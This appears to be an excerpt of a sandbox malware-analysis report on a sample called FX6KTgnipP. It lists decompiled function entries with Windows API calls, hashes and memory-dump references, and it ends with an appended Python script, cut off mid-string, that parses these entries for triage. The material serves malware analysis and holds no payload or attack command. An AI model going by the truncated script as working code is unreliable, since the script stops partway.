• Opcode Fuzzy Hash: ed7d97e0cb4ad913e7a78d0675e9d6745f5e798b4390fe006ae4c0962f797c0d
• Instruction Fuzzy Hash: FBA002DA2BF116FC710872516E07C3B461DC5C6F613328A1FF882C59C6A8C05DF51531
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264C90
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 82670cf426e7f6517244f57bed0a31dbff29b59b84d642269bf5491b1872eade
• Instruction ID: 06f1a1c88baf3c6c892a661bfb756df0898024d3dcc2ab10c4bece9d4a818692
• Opcode Fuzzy Hash: 82670cf426e7f6517244f57bed0a31dbff29b59b84d642269bf5491b1872eade
• Instruction Fuzzy Hash: FBA002DA2BF116FC710872516E07C3B461DC5C6F613328A1FF882C59C6A8C05DF51531
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264C90
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 3906f3e3d6c31e8f216593dbe7e45c3cdb192e6a85a466becfb46c256fddda74
• Instruction ID: 06f1a1c88baf3c6c892a661bfb756df0898024d3dcc2ab10c4bece9d4a818692
• Opcode Fuzzy Hash: 3906f3e3d6c31e8f216593dbe7e45c3cdb192e6a85a466becfb46c256fddda74
• Instruction Fuzzy Hash: FBA002DA2BF116FC710872516E07C3B461DC5C6F613328A1FF882C59C6A8C05DF51531
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264CF1
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 60a115470e1a6d0d49e9c0e4f0581c42553a4da5725dac9899e57de656c1f18d
                                                                                                                                                                            • Instruction ID: 33e6ea9128c3586a185991649f700f2d030352b0a0ff1f1d644b18247cec36f2
                                                                                                                                                                            • Opcode Fuzzy Hash: 60a115470e1a6d0d49e9c0e4f0581c42553a4da5725dac9899e57de656c1f18d
                                                                                                                                                                            • Instruction Fuzzy Hash: E9A0019A2BE512FC710873516E07C3B021DD5D6B613318A1AF882C5586A98159E91571
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,?,?), ref: 00241DFC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemText
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3367045223-0
                                                                                                                                                                            • Opcode ID: 94551cc92b48180fc16bce61140b4eded8f4082999a98def4349f1b4ee7fd84d
                                                                                                                                                                            • Instruction ID: f248bd6a27a517bc7e9f808bb50a1313d5d812fffcc626cdbc1f2599a25fce89
                                                                                                                                                                            • Opcode Fuzzy Hash: 94551cc92b48180fc16bce61140b4eded8f4082999a98def4349f1b4ee7fd84d
                                                                                                                                                                            • Instruction Fuzzy Hash: 9CC00271518200FFCB05CF58E948E1ABBB6FB95311F51C559F05986030C331D960DB62
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetEndOfFile.KERNELBASE(?,0024D115,?,?,?,?,?,?,?), ref: 0024E8DC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 749574446-0
                                                                                                                                                                            • Opcode ID: 9648cc4df923d6310576d62bb68d32efb961fe15f3a86a0b3ba27905b4748efd
                                                                                                                                                                            • Instruction ID: 08bb7591e0a321bab286be023099727bf3476a117c74409e7db1ecbfb9fdbe80
                                                                                                                                                                            • Opcode Fuzzy Hash: 9648cc4df923d6310576d62bb68d32efb961fe15f3a86a0b3ba27905b4748efd
                                                                                                                                                                            • Instruction Fuzzy Hash: 4BA00130201115CB9A411B31EE09A0E7A6ABF4169972980A8A40989071EB2688A2AA81
                                                                                                                                                                            APIs
                                                                                                                                                                            • CloseHandle.KERNELBASE(?,?,00000001,0024DE10,6294DA82,?,00000000,002793B1,000000FF,?,0024BEA6,?), ref: 0024DE6B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                            • Opcode ID: 665f3b2994bf3b97cb44456a343224c0a77978713a878f4d7359774b53d25571
                                                                                                                                                                            • Instruction ID: 98f7822124d75693ffed2a936710fac85e19399f9a7aaefbe40670d71ab293f4
                                                                                                                                                                            • Opcode Fuzzy Hash: 665f3b2994bf3b97cb44456a343224c0a77978713a878f4d7359774b53d25571
                                                                                                                                                                            • Instruction Fuzzy Hash: C5F0A770562F02DFE7389E34D418353B7E46B21334F044B1DD1F6465E4C3B0A9A99B50
                                                                                                                                                                            APIs
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00249CB1
                                                                                                                                                                              • Part of subcall function 0024AC11: GetCurrentProcess.KERNEL32(00000020,?), ref: 0024AC2E
                                                                                                                                                                              • Part of subcall function 0024AC11: GetLastError.KERNEL32 ref: 0024AC72
                                                                                                                                                                              • Part of subcall function 0024AC11: CloseHandle.KERNEL32(?), ref: 0024AC81
                                                                                                                                                                              • Part of subcall function 00242F45: _wcslen.LIBCMT ref: 00242F50
                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,00000000,?,00000001,?,00000000,00000000,?,\??\), ref: 00249EE1
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6294E5CA,00279937,000000FF), ref: 00249F1E
                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,02200000,00000000,?,00000000,?,00000000,?,00000001,?,00000000,00000000), ref: 0024A0BF
                                                                                                                                                                              • Part of subcall function 002414A7: _wcslen.LIBCMT ref: 002414B8
                                                                                                                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 0024A127
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,6294E5CA,00279937,000000FF), ref: 0024A134
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,6294E5CA,00279937,000000FF), ref: 0024A14A
                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(00000000,00000009,?,?,?,?,?,?,?,?,?,6294E5CA,00279937,000000FF), ref: 0024A18E
                                                                                                                                                                            • DeleteFileW.KERNEL32(00000000,00000009,?,?,?,?,?,?,?,?,?,6294E5CA,00279937,000000FF), ref: 0024A196
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseFileHandle_wcslen$CreateErrorLast$ControlCurrentDeleteDeviceDirectoryProcessRemove
                                                                                                                                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                            • API String ID: 3517300771-3508440684
                                                                                                                                                                            • Opcode ID: c2125ea50bf7f3aa1ed31dc8857b42158c0879ce3186ebca3ca4133756f26f10
                                                                                                                                                                            • Instruction ID: 6a494180fb02775b782b50a0e9b032b0fb7b61dc2fc18dfca5ea4ed7c3129a29
                                                                                                                                                                            • Opcode Fuzzy Hash: c2125ea50bf7f3aa1ed31dc8857b42158c0879ce3186ebca3ca4133756f26f10
                                                                                                                                                                            • Instruction Fuzzy Hash: 05327071920289DFDF28DFA4CC85BEE77B8BF15310F144119E849E7281DB749AA8CB61
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0026163A
                                                                                                                                                                              • Part of subcall function 00241E44: GetDlgItem.USER32(00000000,00003021), ref: 00241E88
                                                                                                                                                                              • Part of subcall function 00241E44: SetWindowTextW.USER32(00000000,0027C6C8), ref: 00241E9E
                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 002616BB
                                                                                                                                                                            • EndDialog.USER32(?,00000006), ref: 002616CE
                                                                                                                                                                            • GetDlgItem.USER32(?,0000006C), ref: 002616EA
                                                                                                                                                                            • SetFocus.USER32(00000000), ref: 002616F1
                                                                                                                                                                              • Part of subcall function 002414A7: _wcslen.LIBCMT ref: 002414B8
                                                                                                                                                                              • Part of subcall function 00241DE7: SetDlgItemTextW.USER32(?,?,?), ref: 00241DFC
                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00261763
                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00261783
                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,00000000,00000000,00000000,00000099,?,?,00000000), ref: 00261826
                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 002618AD
                                                                                                                                                                              • Part of subcall function 00241150: _wcslen.LIBCMT ref: 0024115B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: Item$MessageSend$FindText_wcslen$CloseDialogFileFirstFocusH_prolog3_Window
• String ID: %s %s$REPLACEFILEDLG$`!>uJ&
• API String ID: 485132379-2925523198
APIs
Strings
Similarity
• API ID: __floor_pentium4
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 4168288129-2761157908
APIs
• _strlen.LIBCMT ref: 0024438C
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00244523
Strings
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_strlen
• String ID: CMT
• API String ID: 2172594012-2756464174
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00266884
• IsDebuggerPresent.KERNEL32 ref: 00266950
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00266970
• UnhandledExceptionFilter.KERNEL32(?), ref: 0026697A
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
APIs
• GetLastError.KERNEL32(?,?,0024952D,?,00000040,0024931E,00000001,?,?,?,?,0000001C,00257618,0028E0C8,WaitForMultipleObjects error %d, GetLastError %d,000000FF), ref: 00249330
• FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,00000000,00000000,00000000,?,?,0024952D,?,00000040,0024931E,00000001,?,?), ref: 00249351
• _wcslen.LIBCMT ref: 00249360
• LocalFree.KERNEL32(00000000,00000000,00000000,0028E0C8,?,?,0024952D,?,00000040,0024931E,00000001,?,?,?,?,0000001C), ref: 00249373
Similarity
• API ID: ErrorFormatFreeLastLocalMessage_wcslen
• String ID:
• API String ID: 991192900-0
APIs
• VirtualQuery.KERNEL32(80000000,00264D59,0000001C,00264F4E,00000000,?,?,?,?,?,?,?,00264D59,00000004,00295D84,00264FDE), ref: 00264E25
• GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00264D59,00000004,00295D84,00264FDE), ref: 00264E40
Strings
Similarity
• API ID: InfoQuerySystemVirtual
• String ID: D
• API String ID: 401686933-2746444292
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,0026535E), ref: 0026ABBC
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0026535E), ref: 0026ABC6
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0026535E), ref: 0026ABD3
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: .
                                                                                                                                                                            • API String ID: 0-248832578
                                                                                                                                                                            • Opcode ID: d30359daa7dea207329e50a4be5e6a38420bd90ed85df9ea73ad2af2804b487d
                                                                                                                                                                            • Instruction ID: bce7478c3e22911833a8323c70a8d9b334e73a43fcef8513deeb152f6cb192ea
                                                                                                                                                                            • Opcode Fuzzy Hash: d30359daa7dea207329e50a4be5e6a38420bd90ed85df9ea73ad2af2804b487d
                                                                                                                                                                            • Instruction Fuzzy Hash: 9A310971810109AFDB249E78CC84DFB7BBDDF55304F044198F91C97251E6319D54CB60
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 9e76feb55238aef6f2104d7f35b4c35741b7a6e088d7c6c091e67f68abddc892
                                                                                                                                                                            • Instruction ID: 7dc99eedf8c4ce8430b51e5aea1e4996386f612223ecede46d0a9a8193d1e4fb
                                                                                                                                                                            • Opcode Fuzzy Hash: 9e76feb55238aef6f2104d7f35b4c35741b7a6e088d7c6c091e67f68abddc892
                                                                                                                                                                            • Instruction Fuzzy Hash: BE024C71E1021A9BDF14DFA9C8806ADF7F5EF49314F258269D919E7340D730AA51CB90
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0025FD6A
                                                                                                                                                                            • GetNumberFormatW.KERNEL32(00000400,00000000,?,00289714,?,?), ref: 0025FDB3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FormatInfoLocaleNumber
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2169056816-0
                                                                                                                                                                            • Opcode ID: e0197c09b8f3bf96fb76732ba088409bf9bdf3d854c770e0e085a7d10f5e87ea
                                                                                                                                                                            • Instruction ID: 79728efc9a68038bf389721947b207d4969d60b1811a7fd9c65f559469cf45b0
                                                                                                                                                                            • Opcode Fuzzy Hash: e0197c09b8f3bf96fb76732ba088409bf9bdf3d854c770e0e085a7d10f5e87ea
                                                                                                                                                                            • Instruction Fuzzy Hash: D7118E79221348ABDB01DF70EC49BAAB7F8EF08710F00446AB905A7191D270A999CB64
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: CMT
                                                                                                                                                                            • API String ID: 0-2756464174
                                                                                                                                                                            • Opcode ID: cafe7d2bd578293f41ed7d7dbfbebcc461ba59122a05e4c7872cb472fc8cfcf4
                                                                                                                                                                            • Instruction ID: 8c6add0bab7aafbc4136d7cb36b9d3beed98bb2ad32ea7c1df5dc3bc676caae2
                                                                                                                                                                            • Opcode Fuzzy Hash: cafe7d2bd578293f41ed7d7dbfbebcc461ba59122a05e4c7872cb472fc8cfcf4
                                                                                                                                                                            • Instruction Fuzzy Hash: 2862A471A206599FDF0DDF74C881BDD7BA4BF19300F084169EC499B282DB74A968CFA1
                                                                                                                                                                            APIs
                                                                                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,002786CD,?,?,00000008,?,?,0027836D,00000000), ref: 002788FF
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionRaise
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3997070919-0
                                                                                                                                                                            • Opcode ID: 5103609d6ac7f7796ca3f59708fbe30715bd0c082ce2fdec2ffcef2714401182
                                                                                                                                                                            • Instruction ID: 071e37511c05b84f07dbcffe6c9619478d476a8bccf34e8c99c4c03b04054c92
                                                                                                                                                                            • Opcode Fuzzy Hash: 5103609d6ac7f7796ca3f59708fbe30715bd0c082ce2fdec2ffcef2714401182
                                                                                                                                                                            • Instruction Fuzzy Hash: 1EB17A35620609DFD718CF28C48AB647BE0FF45364F29C658E99ACF2A1C735D9A2CB41
                                                                                                                                                                            APIs
                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 002666AA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FeaturePresentProcessor
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2325560087-0
                                                                                                                                                                            • Opcode ID: 4ad1df891f71fd1fc975e73ff71d233aa443c8a7af0f15b9acc8d8a8411dc954
                                                                                                                                                                            • Instruction ID: 90e8f57cee305a2646305466a911363c83bee18700c5391f66b60d1125a100e5
                                                                                                                                                                            • Opcode Fuzzy Hash: 4ad1df891f71fd1fc975e73ff71d233aa443c8a7af0f15b9acc8d8a8411dc954
                                                                                                                                                                            • Instruction Fuzzy Hash: D9518BB1A212068FEF15CF69E88D7AABBF0FB48314F24846AC405EB351D7759990CB50
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 002503ED
                                                                                                                                                                              • Part of subcall function 00250469: __EH_prolog3.LIBCMT ref: 00250470
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3Version
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2775145068-0
                                                                                                                                                                            • Opcode ID: 1b91d5100337e4ed4a5669899d373a9b26182a9528c29123b7c23cba81eff6a2
                                                                                                                                                                            • Instruction ID: 4d34d2b34fbf701684804cac727030643ae2bf1ca420cded0dbee830aa47dae8
                                                                                                                                                                            • Opcode Fuzzy Hash: 1b91d5100337e4ed4a5669899d373a9b26182a9528c29123b7c23cba81eff6a2
                                                                                                                                                                            • Instruction Fuzzy Hash: 57F0A47482524D8EEF24EF70BC897EC7BA45B1630AF044468DE063B252D7B4449D9F15
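As an added worked example (not part of the Joe Sandbox report or its tooling), the following Python script parses the "Joe Sandbox IDA Plugin" function entries listed on this page into records, converts the printed call-site addresses into RVAs against the Offset of the source dump (so they can be pasted into IDA or Ghidra for the unpacked image), and pulls out the entry whose API ID carries the IsDebuggerPresent/UnhandledExceptionFilter pair. SAMPLE is a constructed excerpt copied from the entries above with the Associated: lines dropped; the class and function names are my own and not a Joe Sandbox API.

```python
"""Parse Joe Sandbox 'IDA Plugin' per-function entries and triage API call sites."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed excerpt of the report entries shown on this page (Associated: lines dropped).
SAMPLE = """\
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
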